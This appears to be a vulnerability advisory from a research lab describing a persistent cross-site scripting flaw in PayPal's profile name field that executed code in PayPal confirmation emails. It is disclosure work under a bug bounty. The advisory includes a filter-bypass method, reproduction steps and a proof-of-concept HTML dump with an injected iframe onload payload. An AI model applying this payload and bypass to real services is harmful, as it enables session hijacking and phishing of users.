PayPal Inc Bug Bounty Program 2016 - New Vulnerability Uncovered by German Researcher

Researcher exploits Profile Service Mails via Filter Bypass Issue

The leading core research team of the vulnerability laboratory discovered today in the morning a new vulnerability in the paypal inc online service core web-application and api. The issue was uncovered by Benjamin Kunz Mejri during the participation in the official bug bounty program of paypal. After the paypal inc security department received the first analysis report of the issue, a fix was prepared immediately to protect the infrastructure and customers against active exploitation.

Technical Details

Due to a long term testing we was able to verify with an older registered account a new vulnerability by accessing the panel. The accoutn x01445@gmail.com was registered with special chars in the ownername input fields. By registration of multiple emails to the account we was able to stream the malicious payload in the ownername of the account to another connected paypal user email (research@vulnerability-lab.com). The ownername input field does not encode the vulnerable inserted special chars. When an account is registered with an already exisiting account for sharing it is required to confirm the account by email (link). In this email the malicious injected owner-name payload is executing in the users account email inbox. The web-server of the paypal portal does not filter the input of the already injected code and uses a string to stream it internal to the registere account mail to verify. Thus results in the execution of the payload in the mail inbox of the target account that was added. The reply of the server does run through the main email sender of paypal (service@paypal.de).

A filter has been activated by an automated appliance to make executable codes invisible after taking them to process by send as confirm email. In our testings every second email was manipulated by the server by injection of `div style=``display:none; color:fff; font-size:1pt;`. Even if the interaction was manual or automated coordinated to patch the validation flaw next to processing it we used another method to bypass. 

To bypass the filter then and edit the value=`` its required to update the owner name with payload to [payload]+input, and change it to value=`anything src=`/` so basically `anything` will be the value and src=``/`` will be the new parameter inside that input code form. The same way we used to confirm vulnerability 120  with the EIBBP-32718.

The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources and persistent manipulation of affected or connected service module context.

Request Method(s): Inject
[+] POST

Vulnerable Module(s):
[+] PayPal Account - Profile Account Settings - Unconfirmed Email Account

Vulnerable Parameter(s):
[+] ownername

Affected Module(s):
[+] Confirm your Email Address (service@paypal.de or service@paypal.com)

Proof of Concept

Manual steps to reproduce the vulnerability ...

1. Register a PayPal Inc account
2. Inject a payload as ownername to the paypal user profile
3. Use the bypass filter method to process the input
4. Surf to the profile were the emails becomes visible and click the unconfirmed flag button
Note: Now the service takes the payload and streams the code to the paypal user email accounts
5. Open the postbox of one of the registered accounts that is still not confirmed and watch the header
6. The code executes in the header section next to the introduction sentence with the vulnerable ownername value
7. Successful reproduce of the security vulnerability!

PoC: Source (Confirm Email Address)

Confirm your email address ...
Hello %20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY VIA OWNERNAME!]iframe src="a" onload="alert("VL")" <,<="" p=""><p>Confirm your email address
now to let us know it really belongs to you.</p> <p>Once that's done, you're ready to receive money.</p> <p>If you are unable to click the button below to confirm your
email, please follow this link <span class="confidential">https://www.paypal.com/de/ece/?cn=00622082609784738416&em=research@vulne... <p> <table align=left border="0"
cellspacing="0" cellpadding="0" class="mobile_button" width="100%"> <tbody> <tr> <td height="1" id="button_force_width"> <img height="1" border="0"
src="https://www.paypalobjects.com/webstatic/eCAT/GCE/spacer10.gif" style="display:block;" draggable="false"/> </td> </tr> <tr> <td> <table border="0"
cellspacing="0" cellpadding="0" class="mobile_button"> <tbody> <tr> <td width="1" height="30" id="force_height"> <img width="1" height="30" border="0"
src="https://www.paypalobjects.com/webstatic/eCAT/GCE/spacer10.gif" style="display:block;" draggable="false"/> </td> <td valign="middle" align="left"
class="button_style" style="font-family:HelveticaNeueLight,HelveticaNeue-Light,'Helvetica Neue Light',HelveticaNeue,Helvetica,Arial,sans-serif;font-weight:300;
font-stretch:normal;text-align:center;color:#fff;font-size:15px;background:#0079C1;;border-radius:7px!important; -moz-border-radius: 7px !important; -o-border-radius:
7px !important; -ms-border-radius: 7px !important;line-height:1.45em;padding:7px 15px 8px;margin:0 auto 16px;font-size:1em;padding-bottom:7px;">
<span class="confidential"><a type="Link" target="_BLANK" class="button " l-title="" linkId="7d8753434982d8bb33800b257d167211" style="color:#ffffff; text-decoration:none;
display:block; font-family:Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;"
href="https://www.paypal.com/de/ece/?cn=00622082609784738416&em=research@vulne... style="color:#ffffff; text-decoration:none; display:block;
font-family:Arial,sans-serif; font-weight:bold; font-size:13px; line-height:15px;">Confirm your email</span></a></span> </td> </tr> </tbody> </table> </td> </tr>
</tbody> </table> </p> <br> <!--[if !mso]><!--> <br> <!--<![endif]--><p><p>Thanks,</p> <p>PayPal</p></p> </td> </tr> </tbody> </table> </td>
<td width="12" style="background:url(/i/scr/scr_emailRightBorder_13wx1h.gif) left repeat-y;border-right: 1px solid #ddd;">
<img src="https://www.paypalobjects.com/en_US/i/scr/pixel.gif" border="0" alt=""> </td> </tr> <tr> <td colspan="3">
<img height="13" src="https://www.paypalobjects.com/en_US/i/scr/scr_emailBottomCorners_580wx13... border="0" alt=""> </td> </tr> </tbody> </table>
<table border="0" cellpadding="0" cellspacing="0" id="emailFooter" style="padding-top:20px;font:12px Arial, Verdana, Helvetica, sans-serif;color:#292929;"
width="100%"><tbody><tr><td><p>Copyright © 1999-2015 PayPal. All rights reserved. PayPal (Europe) S.à r.l. et Cie, S.C.A. Société en Commandite
par Actions Registered Office: 22–24 Boulevard Royal, L-2449 Luxembourg RCS Luxembourg B 118 349</p><p class="footer ppid">PayPal PPC000372:4aab730d1f97</p></td></tr></tbody></table>
<img src="https://paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=PPC000... alt="" height="1" width="1" border="0"/>
<img src="https://t.paypal.com/ts?ppid=PPC000372&cnac=DE&rsta=en_DE(en_US)&cust=MLU5GPECNYWH8&unptid=315d1372-78d7-11e5-8112-d48564540750&t=&cal=4aab730d1f97&calc=4aab730d1f97&calf=4aab730d1f97&page=main:email&pgrp=main:email&e=op&mchn=em&s=ci&mail=sys" alt=""
height="1" width="1" border="0"/> </body> </html></div>
  <table border="0" cellpadding="0" cellspacing="0" id="emailWrapperTable" width="580">
     <tbody>
<tr valign="top">
    <td colspan="3">
        <table border="0" cellpadding="0" cellspacing="0" width="100%">
            <tbody>
                <tr valign="top">
                    <td width="130px;"><a href="https://www.paypal.com"><img src="https://www.paypalobjects.com/en_US/i/logo/logo_emailheader_113wx46h.gif...
                </tr>
                <tr>
                    <td>
                        <img alt="" border="0" height="10" src="http://www.paypalobjects.com/en_US/i/scr/pixel.gif" width="1">
                    </td>
                </tr>
            </tbody>
        </table>
    </td>
</tr>

After all the Vulnerability Laboratory Team produced a live-hacking video of the vulnerability to demonstrate the impact. In the video we demonstrate the compromised test account with multiple emails. One of the email is unconfirmed. In the profile of the user is a payload saved to the ownername of the paypal account. This ownername is taken to the confirm email of paypal and send by the original source. After the switch over to the system of the mobile device we extract the send message and save it as basic html file which results in an execution. The bug is located on the application-side and affects the email encoding to the paypal users. This issue could also have an effect to other section as well which has to be approved. The bypass method is to pass the bug through the filter for execution.

PayPal Inc Bug Bounty 2016 - Filter Bypass & Persistent Profil Mail Encoding Web Vulnerability

PayPal Inc finally acknowledged the vulnerability report and issued an unknown amount of money as benefit to the vulnerability laboratory core research team.

Advisory: http://www.vulnerability-lab.com/get_content.php?id=1627

Video: https://www.youtube.com/watch?v=ilLmbVC7RVY

Reference(s):

http://www.securityweek.com/flaw-allowed-hackers-abuse-paypal-confirmation-emails

http://news.softpedia.com/news/security-bug-allowed-attackers-to-send-malicious-emails-via-paypal-s-servers-502381.shtml#sgal_0